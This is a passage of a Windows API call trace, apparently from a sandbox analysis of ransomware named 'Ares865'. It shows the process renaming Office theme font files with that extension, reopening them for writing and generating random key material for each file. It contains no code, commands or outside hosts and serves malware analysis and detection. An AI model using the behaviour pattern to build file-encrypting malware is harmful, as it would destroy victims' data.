[0073.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apex.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.512] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3822) returned 1 [0073.512] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.513] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.513] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.515] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.516] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.516] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.517] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml.Ares865") returned 87 [0073.517] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apothecary.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apothecary.xml.ares865"), dwFlags=0x1) returned 1 [0073.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apothecary.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apothecary.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.518] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3615) returned 1 [0073.518] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.519] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.519] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.521] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.522] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.522] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.522] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml.Ares865") returned 83 [0073.522] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\aspect.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\aspect.xml.ares865"), dwFlags=0x1) returned 1 [0073.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Aspect.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\aspect.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.523] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3595) returned 1 [0073.523] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.524] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.524] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.526] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.527] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.527] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.527] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml.Ares865") returned 83 [0073.527] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\austin.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\austin.xml.ares865"), dwFlags=0x1) returned 1 [0073.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Austin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\austin.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.529] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3606) returned 1 [0073.529] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.530] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.530] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.532] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.532] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.532] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.533] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml.Ares865") returned 86 [0073.533] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\black tie.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\black tie.xml.ares865"), dwFlags=0x1) returned 1 [0073.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Black Tie.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\black tie.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.534] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3835) returned 1 [0073.534] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.535] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.535] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.537] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.537] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.537] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.538] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml.Ares865") returned 82 [0073.538] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\civic.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\civic.xml.ares865"), dwFlags=0x1) returned 1 [0073.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Civic.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\civic.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.539] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3615) returned 1 [0073.539] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.540] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.540] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.544] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.545] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.545] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.545] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml.Ares865") returned 84 [0073.545] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\clarity.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\clarity.xml.ares865"), dwFlags=0x1) returned 1 [0073.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Clarity.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\clarity.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.546] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3599) returned 1 [0073.546] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.547] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.547] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.549] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.550] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.550] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.551] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml.Ares865") returned 86 [0073.551] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\composite.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\composite.xml.ares865"), dwFlags=0x1) returned 1 [0073.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Composite.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\composite.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.551] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3598) returned 1 [0073.552] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.552] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.552] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.554] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.555] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.555] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.556] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml.Ares865") returned 86 [0073.556] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\concourse.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\concourse.xml.ares865"), dwFlags=0x1) returned 1 [0073.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\concourse.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.557] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3526) returned 1 [0073.557] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.557] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.557] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.560] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.560] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.560] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.561] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml.Ares865") returned 84 [0073.561] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\couture.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\couture.xml.ares865"), dwFlags=0x1) returned 1 [0073.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\couture.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.563] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3836) returned 1 [0073.563] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.564] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.564] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.567] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.567] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.567] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.568] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml.Ares865") returned 86 [0073.568] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\elemental.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\elemental.xml.ares865"), dwFlags=0x1) returned 1 [0073.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\elemental.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.569] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3656) returned 1 [0073.569] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.570] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.570] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.572] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.572] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.572] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.573] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml.Ares865") returned 83 [0073.573] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\equity.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\equity.xml.ares865"), dwFlags=0x1) returned 1 [0073.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Equity.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\equity.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.574] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3829) returned 1 [0073.574] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.575] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.575] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.576] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.577] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.577] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.577] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml.Ares865") returned 86 [0073.578] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\essential.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\essential.xml.ares865"), dwFlags=0x1) returned 1 [0073.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Essential.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\essential.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.578] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3606) returned 1 [0073.579] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.579] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.579] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.581] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.582] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.582] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.582] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml.Ares865") returned 86 [0073.583] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\executive.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\executive.xml.ares865"), dwFlags=0x1) returned 1 [0073.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\executive.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.583] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3631) returned 1 [0073.584] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.584] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.584] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.586] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.587] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.587] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.587] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml.Ares865") returned 81 [0073.587] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\flow.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\flow.xml.ares865"), dwFlags=0x1) returned 1 [0073.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\flow.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.588] 